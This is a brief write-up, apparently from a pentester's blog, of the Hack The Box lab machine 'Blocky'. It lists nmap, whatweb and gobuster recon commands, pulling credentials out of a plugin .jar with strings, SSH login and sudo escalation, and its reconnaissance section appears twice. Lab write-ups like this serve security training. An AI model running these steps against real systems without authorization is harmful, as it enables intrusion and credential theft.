PyUs3r

PyUs3r

Pentester, CTF player

Blocky - Hack The Box

May 09, 2025

Reconnaissance

Nmap

nmap --open -sS -p- --min-rate 5000 -vvv -Pn 10.10.10.37

Vulnerability and version scan with nmap

nmap -sCV -vvv 10.10.10.37

Add domain to local DNS

echo "10.10.10.37 blocky.htb" >> /etc/hosts

Whatweb

whatweb http://blocky.htb/

Find Wordpress admin

Gobuster

gobuster dir -u http://blocky.htb/ -w /usr/share/seclists/Discovery/Web-Content/directory-list-2.3-medium.txt -t 20 

Reconnaissance

Nmap

nmap --open -sS -p- --min-rate 5000 -vvv -Pn 10.10.10.37

Vulnerability and version scan with nmap

nmap -sCV -vvv 10.10.10.37

Add domain to local DNS

echo "10.10.10.37 blocky.htb" >> /etc/hosts

Whatweb

whatweb http://blocky.htb/

Find Wordpress admin

Gobuster

gobuster dir -u http://blocky.htb/ -w /usr/share/seclists/Discovery/Web-Content/directory-list-2.3-medium.txt -t 20 

Exploitation

Check .jar files in /plugins

7z x BlockyCore.jar
strings com/myfirstplugin/BlockyCore.class

Connect ssh

ssh notch@10.10.10.37

Post-exploitation

Check notch groups

id

sudo su